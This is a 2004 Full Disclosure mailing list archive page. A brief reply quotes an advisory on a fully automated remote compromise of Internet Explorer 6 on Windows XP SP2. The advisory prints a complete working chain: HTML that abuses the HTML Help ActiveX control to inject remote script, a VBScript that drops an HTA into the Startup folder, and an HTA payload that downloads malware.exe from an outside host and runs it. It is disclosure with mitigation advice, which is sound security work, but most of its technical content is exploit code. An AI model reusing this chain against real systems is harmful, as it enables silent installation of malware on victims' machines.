Full Disclosure mailing list archives
Re: YEY AGAIN Automatic remote compromise of InternetExplorer Service Pack 2 XP SP2
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Sat, 25 Dec 2004 10:24:08 -0800
must only be for SP2? No effect on SP1 no drop, no funny action noted. cheers, mw ----- Original Message ----- From: "Michael Evanchik" <mevanchik () relationship1 com> To: <full-disclosure () lists netsys com>; <bugtraq () securityfocus com>; <NTBUGTRAQ () LISTSERV NTBUGTRAQ COM>; <vuln () vulnwatch org> Sent: Friday, December 24, 2004 8:10 AM Subject: [Full-disclosure] YEY AGAIN Automatic remote compromise of InternetExplorer Service Pack 2 XP SP2
Did they really do a good job on service pack 2? Was it worth the investment that's reported more then the missile defense system? All
these
articles on the great achievement by Microsoft and XP SP2 really merit? They totally forgot HTA files and HTM help files. Who knows that else. "Microsoft SP2 team, that is unacceptable, YOUR FIRED." Donald Trump http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise Dec, 21 2004 Vulnerable ---------- - Microsoft Internet Explorer 6.0 - Microsoft Windows XP Pro SP2 - Microsoft Windows XP Home SP2 Not Tested ------------------------ - Microsoft Windows 98 - Microsoft Internet Explorer 5.x - Microsoft Windows 2003 Server Severity --------- Critical - Remote code execution, no user intervention Intro ------ Although hundreds of millions of dollars have been spent on securing SP2, perfection is impossible. Through the joint effort of Michael Evanchik (http://www.michaelevanchik.com) and Paul from Greyhats Security (http://greyhats.cjb.net), a very critical vulnerability has been
developed
that can compromise a user's system without the need for user interaction besides visiting the malicious page. The vulnerability is not actually a vulnerability in itself, but rather it is uses multiple known holes in SP2 including Help ActiveX Control Related Topics Zone Security Bypass Vulnerability and Help ActiveX Control Related Topics Cross Site Scripting Vulnerability. Why Microsoft has still not patched two of these known vulnerabilities
that
have been out for almost a half of year now, is beyond me. Tech Stuff and Explanation -------------------------- 1. Create a webpage with the following code: sp2rc.htm --------------------------------------------------------------------- <OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1"
value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT> <OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"vbscript\\\"
src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fr
omCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'> </OBJECT> <script> localpage.HHClick(); setTimeout("inject.HHClick()",100); </script> --------------------------------------------------------------------- Explanation of above code: The first object (id: localpage) tells hhctrl.ocx to open a help popup window to the location
C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm.
This file was chosen because it is treated as the local zone and it
doesn't
have any script to mess us up. On some computers an error is shown before the popup. This is the user's only chance to prevent the vulnerability
from
working. If internet explorer were to be closed at this point, the user would be safe. The second object (id: inject) tells the help popup to navigate to a javascript protocol, which executes. Thus, cross site scripting has just taken place. A script tag that uses a remote file is written to the page, and writehta.txt (below) is executed in the unsecured local zone. In the script, HHClick is able to be used to automate the vulnerability. This is more effective than the previously described method of requiring a user to click on a button. 2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the user's startup folder. See Michael Evanchik's analysis of the drag and
drop
vulnerability for an explanation on adodb recordset. Also it is reported that a ADODB recordset can be build locally without using a http server or ftp server like below. writehta.txt --------------------------------------------------------------------- Dim Conn, rs Set Conn = CreateObject("ADODB.Connection") Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _ "Dbq=http://www.malware.com;" & _ "Extensions=asc,csv,tab,txt;" & _ "Persist Security Info=False" Dim sql sql = "SELECT * from foobar.txt" set rs = conn.execute(sql) set rs =CreateObject("ADODB.recordset") rs.Open "SELECT * from foobar.txt", conn rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML rs.close conn.close window.close --------------------------------------------------------------------- 3. f00bar.txt (thanks malware for hosting this file) is the file requested by the adodb recordset (again, read the drag and drop analysis at www.michaelevanchik.com for an explanation on how this works and why the
the
f00bar.txt looks like it does). Because there is absolutely no limit on
what
you can do in an hta file, an old, yet effective method of requesting and saving a file to the user's hd is used. From that, a wscript shell is created and used to run the program. And now, ladies and gentlemen, we
have
compromised the user's machine. f00bar.txt --------------------------------------------------------------------- "meaning less shit i had to put here" "<script language=vbscript> crap = """ """: on error resume next: crap = """ """ : set o = CreateObject(""msxml2.XMLHTTP"") : crap=""" """ : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : crap=""" """ : o.send : crap=""" """ : set s = createobject(""adodb.stream"") : crap=""" """ : s.type=1 : crap=""" """ : s.open : crap=""" """ : s.write o.responseBody : crap=""" """ : s.savetofile ""C:\malware.exe"",2 : crap=""" """ : Set ws = CreateObject(""WScript.Shell"") : crap=""" """ : ws.Run ""C:\malware.exe"", 3, FALSE : crap=""" """</script> crap=""" --------------------------------------------------------------------- 4. Upload hhtctrl.ocx for the computers that don't happen to have this control. All XP's seem to have this by default, some win2k3's do not (according to Michael Evanchik) Proof of Concept? ------------------ - http://freehost07.websamba.com/greyhats/sp2rc.htm - If an error is shown, press OK. This is normal. - Notice in your startup menu a new file called Microsoft Office.hta. When run, this file will download and launch a harmless executable (which includes a pretty neat fire animation) Vendor Recommendations ---------------------- - Like Michael Evanchik said in his previous analysis, Microsoft needs to apply XP Service Pack 2's local zone lockdown to .HTA files and HTML Help (chm) files as well. - This might be a little farfetched, but it would solve a lot of problems: Take out the startup folder and only support running files during startup through the registry. The startup folder is a major part of this vulnerability and I can almost guarantee it will be used for another
remote
compromise. - Microsoft could possibly take HTA files out altogether. I have not seen them used for anything beyond hacking. - No vulnerability is too small or too insignificant to be taken
seriously.
Treat every vulnerability as if it could be dangerous. User Recommendations --------------------- - Disable hta files. - Get yourself antivirus software. I recommend Symantec because once they get their lazy asses off the couch and fix some of this stuff you will be
a
lot better off. - Disable active scripting in Internet Explorer. If nothing else, do this. - Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org) Credit ------ Paul from Greyhats Michael Evanchik Http equiv (thanks for allowing me to use your server for f00bar.txt) Greets ------ - Liu Die Yu (all the work you've done is amazing) Contact ------- paul () greyhats cjb net http://greyhats.cjb.net Note ----- Greyhats is becoming bigger and is in need of an upgrade. If anyone is interested in donating some webspace and a domain name I would be very appreciative. Contact me so that we may work something out :) Michael Evanchik Relationship1 p: 914-921-4400 f: 914-921-6007 mailto:mevanchik () relationship1 com web: http://www.relationship1.com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- YEY AGAIN Automatic remote compromise of Internet Explorer Service Pack 2 XP SP2 Michael Evanchik (Dec 24)
- RE: YEY AGAIN Automatic remote compromise of InternetExplorer Service Pack 2 XP SP2 Aviv Raff (Dec 25)
- RE: YEY AGAIN Automatic remote compromise ofInternetExplorer Service Pack 2 XP SP2 Michael Evanchik (Dec 28)
- Re: YEY AGAIN Automatic remote compromise of InternetExplorer Service Pack 2 XP SP2 morning_wood (Dec 27)
- RE: YEY AGAIN Automatic remote compromise of InternetExplorer Service Pack 2 XP SP2 Aviv Raff (Dec 25)